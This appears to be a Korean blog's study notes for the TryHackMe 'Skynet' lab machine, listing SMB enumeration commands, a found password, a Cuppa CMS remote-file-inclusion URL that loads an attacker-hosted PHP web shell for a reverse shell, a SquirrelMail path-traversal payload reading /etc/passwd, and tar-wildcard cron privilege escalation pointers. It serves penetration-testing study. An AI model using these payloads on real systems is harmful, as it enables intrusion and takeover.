Skynet
A vulnerable Terminator themed Linux machine.
- Scan ports using nmap
- Use GoBuster to enumerate directories
- Experiment with SMBMap to find Samba shares
- Using enumerated credentials to read emails
- Exploit CMS RFI vulnerability
- Exploit tar wildcards for privilege escalation
Flow정리
1. Enumeration (samba)
- nmap,smbmap,enum4linux 사용
2. 정보 획득 및 다운로드
- smbclient, rpcclient, smbget 사용
3. 히든 디렉토리
- gobuster
4. CMS 버전, exploit 검색
5. LFI, RFI
- RFI를 통한 리버스 웹쉘 실행
6. 권한 상승
- cron 작업 + tar 와일드카드 취약점 이용
SAMBA(리눅스가 SMB를 이용하여 windows시스템과 파일공유 도와주는 툴)
smbmap(Enumation tool)
smbmap -H [ip]
smbclient
열거: smbclient -L //10.10.7.56
접속(익명): smbclient //[ip]/anonymous
계정접속: smbclient //[ip]/milesdyson -U 'milesdyson'
다운로드: smbget: smb://[ip]/anonymous/[folder or file]
(smbget 사용시 smb프로토콜을 붙여주는것이 중요 포인트!)
rpcclient -U '' [ip]
$> enumdomusers
milesdyson
cyborg007haloterminator
cuppa (RFI&LFI를 통한 웹쉘 reverse RCE 하나 있음)
/cuppa/alerts/alertConfigField.php?urlConfig=http://10.11.3.30/phpshell.php
(http 프로토콜 붙여줘야함..)
cronjob 이용 권한 상승
1. 시스템 작업 리스트: /etc/crontab
2. 사용자 작업 리스트: crontab -l
3. APP 크론 작업 리스트: /etc/cron.d/*
tar의 와일드카드(*)를 이용한 권한 상승 취약점
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
OPENSSL 1.1.1 업그레이드
https://askubuntu.com/questions/1102803/how-to-upgrade-openssl-1-1-0-to-1-1-1-in-ubuntu-18-04
skynet 롸잇업
https://blog.tryhackme.com/skynet-writeup/
squirrelmail 1.4.3 (RCE와 file inclusion이 있음)
[squirrelmail dir] /src/redirect.php?plugins[]=../../../../etc/passwd%00
=>include안됨, Fake임 어쨋든 이런게 있었다 정도로 넘어가자
'OSCP > TryHackMe' 카테고리의 다른 글
Hacking with Powershell (0) | 2020.05.06 |
---|---|
[Linux] Daily Bugle (0) | 2020.04.25 |
[Linux] Game Zone (0) | 2020.04.22 |
[Windows] HackPark (0) | 2020.04.20 |
[Windows] Alfred (0) | 2020.04.16 |